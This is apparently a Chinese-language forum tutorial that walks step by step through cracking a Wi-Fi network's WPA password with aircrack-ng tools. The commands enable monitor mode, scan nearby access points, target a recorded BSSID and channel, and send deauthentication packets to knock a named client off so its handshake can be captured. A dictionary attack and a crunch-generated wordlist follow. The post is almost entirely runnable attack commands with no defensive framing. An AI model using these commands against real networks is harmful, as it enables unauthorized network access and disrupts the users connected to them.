|
[pre]
iwconfig
[/pre]
#确认网卡信息。
[pre]
airmon-ng start wlan0
[/pre]
#激活网卡至监视模式。
[pre]
airodump-ng wlan0mon
[/pre]
#获取附近AP 信息。
这里解释几个参数:
BSSID(Basic Service SetIdentifier): AP 的MAC 地址。
ESSID(The Extended Service Set Identifier): AP 的名称。
PWR(Power): 信号强度。
Beacons: AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒会发送10个左右的beacon,所以它们能在很远的地方就被发现。
#Data:当前数据传输量。
#/s:过去10秒钟内每秒捕获数据分组的数量。
CH(Channel): AP 所在的频道。
MB: AP 的最大传输速度。MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g。后面带.的表示短封包标头,处理速度快,更利于破解。
ENC(Encryption): 使用的加密算法体系。
CIPHER: 检测到的加密算法。#这个和ENC 的区别我确实不明白,有没有知道的朋友可以告诉我。
AUTH(Authority): 认证方式。
Elapsed: 用过的时间。
记录 TEST-jglimmers 的 MAC 地址(BSSID),频道(CH)。
BSSID: 88:25:93:5A:B5:6A
CH: 1
[pre]
airodump-ng --ivs -w 文件地址 --bssid BSSID wlan0mon #开始抓包, -w(write) 抓到的包保存的位置
[/pre]
[pre]
aireplay-ng -0 10 -a 88:25:93:5A:B5:6A -c 68:17:29:26:C3:16 wlan0mon
[/pre]
#如果发现像我一样得到的数据较少可尝试发送数据包
当经过第2 步发送大量数据包之后只要发现第1 步中右上角出现了 handshake: AP的MAC(BSSID),就可以 CRTL+C 停止。
[pre]
aircrack-ng -w Wordlists.txt CAP-01.cap
[/pre]
#-w表示字典包的路径, CAP 表示第 1 步中保存的文件中 -01.cap
这样等待破解成功即可!
这里给大家推荐一个密码生成工具 Crunch
如:要生成0-9之间的密码,执行命令
[pre]
crunch 8 8 0123456789 -o /root/pass.txt
[/pre]
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|